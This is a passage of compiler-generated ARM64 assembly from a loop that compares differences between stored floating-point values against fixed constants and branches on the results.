b LBB1_209
LBB1_209: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_215
b LBB1_210
LBB1_210: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_215
b LBB1_211
LBB1_211: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_215
b LBB1_212
LBB1_212: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_215
b LBB1_213
LBB1_213: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_215
b LBB1_214
LBB1_214: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_215
LBB1_215: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_216
LBB1_216: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_217
LBB1_217: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_218
LBB1_218: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_219
LBB1_219: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_220
LBB1_220: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_221
LBB1_221: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_222
LBB1_222: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_223
LBB1_223: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_224
LBB1_224: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_225
LBB1_225: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_235
b LBB1_226
LBB1_226: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_235
b LBB1_227
LBB1_227: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_235
b LBB1_228
LBB1_228: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_235
b LBB1_229
LBB1_229: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_235
b LBB1_230
LBB1_230: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_235
b LBB1_231
LBB1_231: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_235
b LBB1_232
LBB1_232: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_235
b LBB1_233
LBB1_233: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_235
b LBB1_234
LBB1_234: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-68]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_235
LBB1_235: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_236
LBB1_236: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_237
LBB1_237: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_238
LBB1_238: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_239
LBB1_239: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_240
LBB1_240: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #144]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_241
LBB1_241: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_242
LBB1_242: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_243
LBB1_243: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_244
LBB1_244: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_245
LBB1_245: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_255
b LBB1_246
LBB1_246: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_255
b LBB1_247
LBB1_247: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_255
b LBB1_248
LBB1_248: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_255
b LBB1_249
LBB1_249: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_255
b LBB1_250
LBB1_250: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #144]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_255
b LBB1_251
LBB1_251: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_255
b LBB1_252
LBB1_252: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_255
b LBB1_253
LBB1_253: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_255
b LBB1_254
LBB1_254: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldur s0, [x29, #-76]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_255
LBB1_255: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_256
LBB1_256: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_257
LBB1_257: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_258
LBB1_258: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_259
LBB1_259: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_260
LBB1_260: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_261
LBB1_261: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_262
LBB1_262: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_263
LBB1_263: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_264
LBB1_264: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_265
LBB1_265: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_275
b LBB1_266
LBB1_266: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_275
b LBB1_267
LBB1_267: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_275
b LBB1_268
LBB1_268: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_275
b LBB1_269
LBB1_269: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_275
b LBB1_270
LBB1_270: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_275
b LBB1_271
LBB1_271: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_275
b LBB1_272
LBB1_272: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_275
b LBB1_273
LBB1_273: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_275
b LBB1_274
LBB1_274: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_275
LBB1_275: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_276
LBB1_276: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_277
LBB1_277: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_278
LBB1_278: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_279
LBB1_279: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_280
LBB1_280: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_281
LBB1_281: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-64]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_282
LBB1_282: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_283
LBB1_283: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_284
LBB1_284: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_285
LBB1_285: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_295
b LBB1_286
LBB1_286: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_295
b LBB1_287
LBB1_287: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_295
b LBB1_288
LBB1_288: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_295
b LBB1_289
LBB1_289: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_295
b LBB1_290
LBB1_290: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_295
b LBB1_291
LBB1_291: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-64]
fcvt d2, s0
